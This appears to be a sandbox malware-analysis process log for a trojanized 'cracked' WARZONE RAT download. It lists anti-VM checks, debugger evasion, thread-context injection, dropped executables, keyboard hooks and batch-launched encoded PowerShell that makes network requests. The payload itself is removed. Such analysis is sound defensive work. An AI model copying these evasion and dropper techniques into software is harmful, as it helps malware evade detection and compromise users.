-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:13⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7716 /prefetch:13⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12963522789292377245,2407174719499987538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:13⤵PID:3844
-
-
-
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WARZONERAT3.03\" -spe -an -ai#7zMap8153:90:7zEvent24230 2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4356
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\WARZONERAT3.03\PASSWORD.txt 2⤵
- Opens file in notepad (likely ransom note)
PID:4344
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\WARZONERAT3.03\" -an -ai#7zMap25593:122:7zEvent31954 2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2480
C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe" 2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3864

C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe
"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE RAT 3.03 Cracked.exe" 3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3596
C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe" 2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5104

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8F75.tmp\8F76.bat "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"" 3⤵
PID:1296
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e [base64-encoded command removed] 4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264
C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe" 2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:2536
C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe
"C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe" 2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1264

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7744.tmp\7745.bat "C:\Users\Admin\Downloads\WARZONERAT3.03\WARZONE RAT 3.03\WARZONE-RAT 3.03 Cracked.exe"" 3⤵
PID:1968
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e [base64-encoded command removed] 4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2076
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4 2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3824
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding 1⤵
PID:1884

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding 1⤵
PID:2980

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x4f4 1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding 1⤵
PID:4444
Network
MITRE ATT&CK Enterprise v15
Downloads